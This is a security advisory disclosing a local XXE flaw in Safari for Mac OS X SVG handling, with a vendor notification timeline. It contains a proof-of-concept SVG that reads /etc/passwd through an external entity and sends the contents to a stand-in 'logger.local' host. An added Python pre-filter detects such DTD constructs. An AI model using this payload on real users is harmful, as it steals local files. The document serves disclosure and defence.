Advisory ID: SGMA16-003
Title: Apple Safari for Mac OS X SVG local XXE
Product: Apple Safari for Mac OS X
Version: 9.1.1 and probably prior
Vendor: apple.com
Vulnerability type: XXE
Risk level: Medium
Credit: Filippo Cavallarin - wearesegment.com
CVE: N/A
Vendor notification: 2015-04-08
Vendor fix: N/A
Public disclosure: 2016-07-05
Details
Safari for Mac OS X is prone to an XXE vulnerability when processing crafted SVG images.
An attacker may use this vulnerability to steal files from the local computer by tricking a user
into opening an SVG image from a local location (e.g. a USB key).
This vulnerability is mitigated by file quarantine and does not work with downloaded files.
Proof of concept:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="19000px" xmlns:xlink="http://www.w3.org/1999/xlink" >
<text x="-1000" y="-1000" >&xxe;</text>
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script>
var logger = "http://logger.local/?file=" + encodeURIComponent(document.getElementsByTagName("text")[0].innerHTML);
document.createElementNS('http://www.w3.org/2000/svg','image').setAttributeNS('http://www.w3.org/1999/xlink','href', logger);
</script>
</svg>
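As an added, defender-side example that is not part of the advisory: a Python pre-check that inspects an SVG's DOCTYPE for the external entity declaration the proof of concept above relies on, so a file can be rejected before it reaches a renderer or an image pipeline. The sample inputs are constructed for this example; the first is cut down from the PoC in this advisory.

```python
import re

# Constructed sample, cut down from the PoC in this advisory: the internal
# DTD subset declares an external entity that points at a local file.
XXE_SVG = '''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>'''

# Constructed benign SVG: no DOCTYPE at all.
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'

# Constructed: DOCTYPE with only an external DTD reference. An external DTD
# can itself declare entities, so a strict policy treats it as blocking too.
EXT_DTD_SVG = '''<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg"/>'''

DOCTYPE_RE = re.compile(
    r'<!DOCTYPE\s+(?P<name>[^\s\[>]+)'          # root element name
    r'(?P<ext>\s+(?:SYSTEM|PUBLIC)[^\[>]*)?'    # optional external DTD id
    r'(?:\s*\[(?P<subset>.*?)\])?'              # optional internal subset
    r'\s*>', re.IGNORECASE | re.DOTALL)
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<param>%\s+)?(?P<name>\S+)\s+(?P<def>[^>]*)>',
    re.IGNORECASE | re.DOTALL)
EXTERNAL_ID_RE = re.compile(r'^\s*(SYSTEM|PUBLIC)\b', re.IGNORECASE)

# Findings that make a file unacceptable; plain internal entities are not
# XXE, although entity-expansion DoS is a separate concern not covered here.
BLOCKING = {'external-entity', 'parameter-entity', 'external-dtd'}

def find_xxe_indicators(svg_text):
    """Return a list of (kind, detail) findings; empty means no DTD present."""
    findings = []
    m = DOCTYPE_RE.search(svg_text)
    if not m:
        return findings
    if m.group('ext'):
        findings.append(('external-dtd', m.group('ext').strip()))
    for e in ENTITY_RE.finditer(m.group('subset') or ''):
        name, definition = e.group('name'), e.group('def').strip()
        if e.group('param'):
            findings.append(('parameter-entity', name))
        if EXTERNAL_ID_RE.match(definition):
            findings.append(('external-entity', name + ' -> ' + definition))
        elif not e.group('param'):
            findings.append(('internal-entity', name))
    return findings

def is_safe_svg(svg_text):
    """True when none of the blocking DTD constructs is declared."""
    return not any(kind in BLOCKING for kind, _ in find_xxe_indicators(svg_text))
```

This is a pre-filter, not a replacement for parsing with entity resolution disabled in whatever library actually renders the file.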
Notes
The vendor was notified more than one year before public disclosure, and the answer was that the issue was
still under analysis. We contacted the vendor again a few weeks before public disclosure but got no reply.
Solution
N/A
References
https://www.wearesegment.com/research/Apple-Safari-for-Mac-OS-X-SVG-local-XXE